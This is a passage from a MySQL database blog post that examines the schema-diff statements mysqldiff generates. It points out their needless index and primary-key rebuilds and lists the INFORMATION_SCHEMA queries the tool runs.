ALTER TABLE `employees`.`departments` DROP INDEX dept_name, ADD UNIQUE INDEX dept_name (dept_name), CHANGE COLUMN dept_name dept_name varchar(256) NULL;

[...]
# Comparing `employees`.`employees` to `employees`.`employees`        [FAIL]
# Transformation for --changes-for=server1:

ALTER TABLE `employees`.`employees` DROP PRIMARY KEY, ADD PRIMARY KEY(`emp_no`), ADD INDEX last_name (last_name,first_name);

As we can see, the tool is not perfect. There are two problems here:

1- On the departments table it drops a UNIQUE key that is present on both servers, only to add it again. A waste of time and resources.

2- On the employees table it drops and recreates the PRIMARY KEY, again something that is not needed at all.

I have created a bug report, but this also teaches us a good lesson: don’t just copy and paste commands without double-checking them first.

What does mysqldiff run under the hood?

Mostly queries on INFORMATION_SCHEMA. These are the ones used to check inconsistencies on departments:

SHOW CREATE TABLE `departments`;

SELECT TABLE_SCHEMA, TABLE_NAME, ENGINE, AUTO_INCREMENT, AVG_ROW_LENGTH, CHECKSUM, TABLE_COLLATION, TABLE_COMMENT, ROW_FORMAT, CREATE_OPTIONS
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

SELECT ORDINAL_POSITION, COLUMN_NAME, COLUMN_TYPE, IS_NULLABLE, COLUMN_DEFAULT, EXTRA, COLUMN_COMMENT, COLUMN_KEY
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

SELECT PARTITION_NAME, SUBPARTITION_NAME, PARTITION_ORDINAL_POSITION, SUBPARTITION_ORDINAL_POSITION, PARTITION_METHOD, SUBPARTITION_METHOD, PARTITION_EXPRESSION, SUBPARTITION_EXPRESSION, PARTITION_DESCRIPTION
FROM INFORMATION_SCHEMA.PARTITIONS
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

SELECT CONSTRAINT_NAME, COLUMN_NAME, REFERENCED_TABLE_SCHEMA, REFERENCED_TABLE_NAME, REFERENCED_COLUMN_NAME
FROM INFORMATION_SCHEMA.KEY_COLUMN_USAGE
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments' AND REFERENCED_TABLE_SCHEMA IS NOT NULL;

SELECT TABLE_SCHEMA, TABLE_NAME, ENGINE, AUTO_INCREMENT, AVG_ROW_LENGTH, CHECKSUM, TABLE_COLLATION, TABLE_COMMENT, ROW_FORMAT, CREATE_OPTIONS
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

SELECT ORDINAL_POSITION, COLUMN_NAME, COLUMN_TYPE, IS_NULLABLE, COLUMN_DEFAULT, EXTRA, COLUMN_COMMENT, COLUMN_KEY
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

SELECT PARTITION_NAME, SUBPARTITION_NAME, PARTITION_ORDINAL_POSITION, SUBPARTITION_ORDINAL_POSITION, PARTITION_METHOD, SUBPARTITION_METHOD, PARTITION_EXPRESSION, SUBPARTITION_EXPRESSION, PARTITION_DESCRIPTION
FROM INFORMATION_SCHEMA.PARTITIONS
WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

As a summary, it checks partitions, row format, collation, constraints and so on.

Conclusion

There are different tools for different purposes. We can check data consistency with pt-table-checksum/pt-table-sync, and also the table definitions with mysqldiff.

The post Checking table definition consistency with mysqldiff appeared first on MySQL Performance Blog.
